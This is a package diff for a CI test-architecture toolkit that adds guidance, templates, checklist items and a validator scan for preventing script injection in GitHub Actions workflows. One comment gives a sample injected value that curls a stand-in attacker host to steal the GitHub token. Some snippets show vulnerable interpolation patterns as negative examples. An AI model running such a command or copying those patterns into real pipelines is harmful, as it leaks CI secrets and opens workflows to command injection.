bmad-method-test-architecture-enterprise 1.4.1 → 1.5.0

package/package.json

@@ -1,7 +1,7 @@
 {
   "$schema": "https://json.schemastore.org/package.json",
   "name": "bmad-method-test-architecture-enterprise",
-  "version": "1.4.1",
+  "version": "1.5.0",
   "description": "Master Test Architect for quality strategy, test automation, and release gates",
   "keywords": [
     "bmad",

package/release_notes.md

@@ -1,9 +1,11 @@
-## 🚀 What's New in v1.4.1
+## 🚀 What's New in v1.5.0
+
+### ✨ New Features
+- feat: harden generated ci related yml
 
 ### 📦 Other Changes
-- docs: clarified how sub agents and agent teams work
-- addressed pr comments
-- Merge pull request #48 from bmad-code-org/docs/workers-subagents-agent-teams
+- addressed PR comments
+- Merge pull request #49 from bmad-code-org/feat/harden-generated-ci-related-yml
 
 
 ## 📦 Installation
@@ -13,4 +15,4 @@ npx bmad-method install
 # Select "Test Architect" from module menu
 ```
 
-**Full Changelog**: https://github.com/bmad-code-org/bmad-method-test-architecture-enterprise/compare/v1.4.0...v1.4.1
+**Full Changelog**: https://github.com/bmad-code-org/bmad-method-test-architecture-enterprise/compare/v1.4.1...v1.5.0

package/src/testarch/knowledge/ci-burn-in.md

@@ -8,6 +8,48 @@ CI pipelines must execute tests reliably, quickly, and provide clear feedback. B
 
 CI is the quality gate for production. A poorly configured pipeline either wastes developer time (slow feedback, false positives) or ships broken code (false negatives, insufficient coverage). Burn-in testing ensures reliability by stress-testing changed code, while parallel execution and intelligent test selection optimize speed without sacrificing thoroughness.
 
+## Security: Script Injection Prevention
+
+**Rule:** NEVER use `${{ inputs.* }}` or user-controlled GitHub context directly in `run:` blocks. Always pass through `env:` and reference as `"$ENV_VAR"` (double-quoted).
+
+When CI templates are extended into reusable workflows (`on: workflow_call`), manual dispatch workflows (`on: workflow_dispatch`), or composite actions, `${{ inputs.* }}` values become user-controllable. Interpolating them directly in `run:` blocks enables shell command injection.
+
+### Vulnerable vs Safe Pattern
+
+```yaml
+# ❌ VULNERABLE — inputs.test_ids could contain: "; curl attacker.com/steal?t=$(cat $GITHUB_TOKEN)"
+- name: Run tests
+  run: |
+    npx playwright test --grep "${{ inputs.test_ids }}"
+
+# ✅ SAFE — env var cannot break out of shell quoting
+- name: Run tests
+  env:
+    TEST_IDS: ${{ inputs.test_ids }}
+  run: |
+    npx playwright test --grep "$TEST_IDS"
+```
+
+### Unsafe Contexts (require env: intermediary)
+
+- `${{ inputs.* }}` — workflow_call and workflow_dispatch inputs
+- `${{ github.event.* }}` — treat the entire event namespace as unsafe (PR titles, issue bodies, comment bodies, label names, etc.)
+- `${{ github.head_ref }}` — PR source branch name (user-controlled)
+
+**Important:** Passing through `env:` prevents GitHub expression injection, but inputs must still be treated as DATA, not COMMANDS. Never execute an input-derived env var as a shell command (e.g., `run: $CMD` where CMD came from an input). Use fixed commands and pass inputs only as quoted arguments.
+
+### Safe Contexts (safe from GitHub expression injection in run: blocks)
+
+- `${{ steps.*.outputs.* }}` — pre-computed by your own code
+- `${{ matrix.* }}` — defined in workflow YAML
+- `${{ runner.os }}`, `${{ github.sha }}`, `${{ github.ref }}` — system-controlled
+- `${{ secrets.* }}` — secret store, not user-injectable
+- `${{ env.* }}` — already an env var
+
+> **Note:** "Safe from expression injection" means these values cannot be manipulated by external actors to break out of `${{ }}` interpolation. Standard shell quoting practices still apply — always double-quote variable references in `run:` blocks.
+
+---
+
 ## Pattern Examples
 
 ### Example 1: GitHub Actions Workflow with Parallel Execution

package/src/workflows/testarch/ci/checklist.md

@@ -161,6 +161,7 @@ Note: CI setup is typically a one-time task per repo and can be run any time aft
 - [ ] Environment variables for sensitive data
 - [ ] Artifact retention appropriate (not too long)
 - [ ] No debug output exposing secrets
+- [ ] **MUST**: No `${{ inputs.* }}` or user-controlled GitHub context (`github.event.pull_request.title`, `github.event.issue.body`, `github.event.comment.body`, `github.head_ref`) directly in `run:` blocks — all passed through `env:` intermediaries and referenced as `"$ENV_VAR"`
 
 ## Integration Points
 

package/src/workflows/testarch/ci/github-actions-template.yaml

@@ -208,3 +208,121 @@ jobs:
           if [ "${{ needs.burn-in.result }}" == "failure" ]; then
             echo "⚠️ **Flaky tests detected** - Review burn-in artifacts" >> $GITHUB_STEP_SUMMARY
           fi
+
+# ============================================================================
+# EXTENSION PATTERNS — Script Injection Prevention
+# ============================================================================
+# When extending this template into reusable workflows, manual dispatch
+# workflows, or composite actions, NEVER use ${{ inputs.* }} directly in
+# run: blocks. Always pass through env: intermediaries.
+#
+# KEY PRINCIPLE: Inputs must be DATA, not COMMANDS.
+# Pass inputs through env: and interpolate as quoted arguments into fixed
+# commands. NEVER accept command-shaped inputs (e.g., install-command,
+# test-command) that get executed as shell code — even through env:.
+#
+# --- Reusable Workflow (workflow_call) ---
+#
+# on:
+#   workflow_call:
+#     inputs:
+#       test-grep:
+#         description: 'Test grep filter (data only — not a command)'
+#         type: string
+#         required: false
+#         default: ''
+#       base-ref:
+#         description: 'Base branch for diff'
+#         type: string
+#         required: false
+#         default: 'main'
+#       burn-in-count:
+#         description: 'Number of burn-in iterations'
+#         type: string
+#         required: false
+#         default: '10'
+#
+# jobs:
+#   test:
+#     runs-on: ubuntu-latest
+#     steps:
+#       - uses: actions/checkout@v4
+#       # Fixed command — not derived from inputs
+#       - name: Install dependencies
+#         run: npm ci
+#       # ✅ SAFE — input is DATA passed as an argument to a fixed command
+#       - name: Run tests
+#         env:
+#           TEST_GREP: ${{ inputs.test-grep }}
+#         run: |
+#           # Security: inputs passed through env: to prevent script injection
+#           if [ -n "$TEST_GREP" ]; then
+#             npx playwright test --grep "$TEST_GREP"
+#           else
+#             npx playwright test
+#           fi
+#
+# --- Manual Dispatch (workflow_dispatch) ---
+#
+# on:
+#   workflow_dispatch:
+#     inputs:
+#       test-grep:
+#         description: 'Test grep filter (data only — not a command)'
+#         type: string
+#         required: false
+#       environment:
+#         description: 'Target environment'
+#         type: choice
+#         options: [staging, production]
+#
+# jobs:
+#   run-tests:
+#     runs-on: ubuntu-latest
+#     steps:
+#       - uses: actions/checkout@v4
+#       # ✅ SAFE — input is DATA interpolated into a fixed command
+#       - name: Run selected tests
+#         env:
+#           TEST_GREP: ${{ inputs.test-grep }}
+#         run: |
+#           # Security: inputs passed through env: to prevent script injection
+#           npx playwright test --grep "$TEST_GREP"
+#
+# --- Composite Action (action.yml) ---
+#
+# inputs:
+#   test-grep:
+#     description: 'Test grep filter (data only — not a command)'
+#     required: false
+#     default: ''
+#   burn-in-count:
+#     description: 'Number of burn-in iterations'
+#     required: false
+#     default: '10'
+#
+# runs:
+#   using: composite
+#   steps:
+#     # ✅ SAFE — inputs are DATA arguments to fixed commands
+#     - name: Run burn-in
+#       shell: bash
+#       env:
+#         TEST_GREP: ${{ inputs.test-grep }}
+#         BURN_IN_COUNT: ${{ inputs.burn-in-count }}
+#       run: |
+#         # Security: inputs passed through env: to prevent script injection
+#         for i in $(seq 1 "$BURN_IN_COUNT"); do
+#           echo "Burn-in iteration $i/$BURN_IN_COUNT"
+#           npx playwright test --grep "$TEST_GREP" || exit 1
+#         done
+#
+# ❌ NEVER DO THIS:
+#   # Direct ${{ inputs.* }} in run: — GitHub expression injection
+#   - run: npx playwright test --grep "${{ inputs.test-grep }}"
+#
+#   # Executing input-derived env var as a command — still command injection
+#   - env:
+#       CMD: ${{ inputs.test-command }}
+#     run: $CMD
+# ============================================================================

package/src/workflows/testarch/ci/steps-c/step-02-generate-pipeline.md

@@ -119,6 +119,44 @@ Use templates from `{installed_path}` when available. Adapt the template to the
 
 ---
 
+## Security: Script Injection Prevention
+
+> **CRITICAL:** Treat `${{ inputs.* }}` and the entire `${{ github.event.* }}` namespace as unsafe by default. ALWAYS route them through `env:` intermediaries and reference as double-quoted `"$ENV_VAR"` in `run:` blocks. NEVER interpolate them directly.
+
+When the generated pipeline is extended into reusable workflows (`on: workflow_call`), manual dispatch (`on: workflow_dispatch`), or composite actions, these values become user-controllable and can inject arbitrary shell commands.
+
+**Two rules for generated `run:` blocks:**
+
+1. **No direct interpolation** — pass unsafe contexts through `env:`, reference as `"$ENV_VAR"`
+2. **Inputs must be DATA, not COMMANDS** — never accept command-shaped inputs (e.g., `inputs.install-command`) that get executed as shell code. Even through `env:`, running `$CMD` where CMD comes from an input is still command injection. Use fixed commands and pass inputs only as arguments.
+
+```yaml
+# ✅ SAFE — input is DATA interpolated into a fixed command
+- name: Run tests
+  env:
+    TEST_GREP: ${{ inputs.test-grep }}
+  run: |
+    # Security: inputs passed through env: to prevent script injection
+    npx playwright test --grep "$TEST_GREP"
+
+# ❌ NEVER — direct GitHub expression injection
+- name: Run tests
+  run: |
+    npx playwright test --grep "${{ inputs.test-grep }}"
+
+# ❌ NEVER — executing input-derived env var as a command
+- name: Install
+  env:
+    CMD: ${{ inputs.install-command }}
+  run: $CMD
+```
+
+Include a `# Security: inputs passed through env: to prevent script injection` comment in generated YAML wherever this pattern is applied.
+
+**Safe contexts** (do NOT need `env:` intermediaries): `${{ steps.*.outputs.* }}`, `${{ matrix.* }}`, `${{ runner.os }}`, `${{ github.sha }}`, `${{ github.ref }}`, `${{ secrets.* }}`, `${{ env.* }}`.
+
+---
+
 ## 2. Pipeline Stages
 
 Include stages:

package/src/workflows/testarch/ci/steps-c/step-03-configure-quality-gates.md

@@ -48,6 +48,29 @@ Use `{knowledgeIndex}` to load `ci-burn-in.md` guidance:
 - **Frontend or Fullstack** (`test_stack_type` is `frontend` or `fullstack`): Enable burn-in by default. Burn-in targets UI flakiness (race conditions, selector instability, timing issues).
 - **Backend only** (`test_stack_type` is `backend`): Skip burn-in by default. Backend tests (unit, integration, API) are deterministic and rarely exhibit UI-related flakiness. If the user explicitly requests burn-in for backend, honor that override.
 
+**Security: Script injection prevention for reusable burn-in workflows:**
+
+When burn-in is extracted into a reusable workflow (`on: workflow_call`), all `${{ inputs.* }}` values MUST be passed through `env:` intermediaries and referenced as quoted `"$ENV_VAR"`. Never interpolate them directly.
+
+**Inputs must be DATA, not COMMANDS.** Do not accept command-shaped inputs (e.g., `inputs.install-command`, `inputs.test-command`) that get executed as shell code — even through `env:`, running `$CMD` is still command injection. Use fixed commands (e.g., `npm ci`, `npx playwright test`) and pass inputs only as data arguments.
+
+```yaml
+# ✅ SAFE — fixed commands with data-only inputs
+- name: Install dependencies
+  run: npm ci
+- name: Run burn-in loop
+  env:
+    TEST_GREP: ${{ inputs.test-grep }}
+    BURN_IN_COUNT: ${{ inputs.burn-in-count }}
+    BASE_REF: ${{ inputs.base-ref }}
+  run: |
+    # Security: inputs passed through env: to prevent script injection
+    for i in $(seq 1 "$BURN_IN_COUNT"); do
+      echo "Burn-in iteration $i/$BURN_IN_COUNT"
+      npx playwright test --grep "$TEST_GREP" || exit 1
+    done
+```
+
 ---
 
 ## 2. Quality Gates

package/src/workflows/testarch/ci/steps-v/step-01-validate.md

@@ -50,6 +50,20 @@ Read `{validationChecklist}` and list all criteria.
 
 Evaluate outputs against each checklist item.
 
+### 2a. Script Injection Scan
+
+Scan all generated YAML workflow files for unsafe interpolation patterns inside `run:` blocks.
+
+**Unsafe patterns to flag (FAIL):**
+
+- `${{ inputs.* }}` — all workflow inputs are user-controllable
+- `${{ github.event.* }}` — treat the entire event namespace as unsafe by default (includes PR titles, issue bodies, comment bodies, label names, etc.)
+- `${{ github.head_ref }}` — PR source branch name (user-controlled)
+
+**Detection method:** For each `run:` block in generated YAML, check if any of the above expressions appears in the run script body. If found, flag as **FAIL** with the exact line and recommend converting to the safe `env:` intermediary pattern (pass through `env:`, reference as double-quoted `"$ENV_VAR"`).
+
+**Safe patterns to ignore** (exempt from flagging): `${{ steps.*.outputs.* }}`, `${{ matrix.* }}`, `${{ runner.os }}`, `${{ github.sha }}`, `${{ github.ref }}`, `${{ secrets.* }}`, `${{ env.* }}` — these are safe from GitHub expression injection when used in `run:` blocks.
+
 ### 3. Write Report
 
 Write a validation report to `{outputFile}` with PASS/WARN/FAIL per section.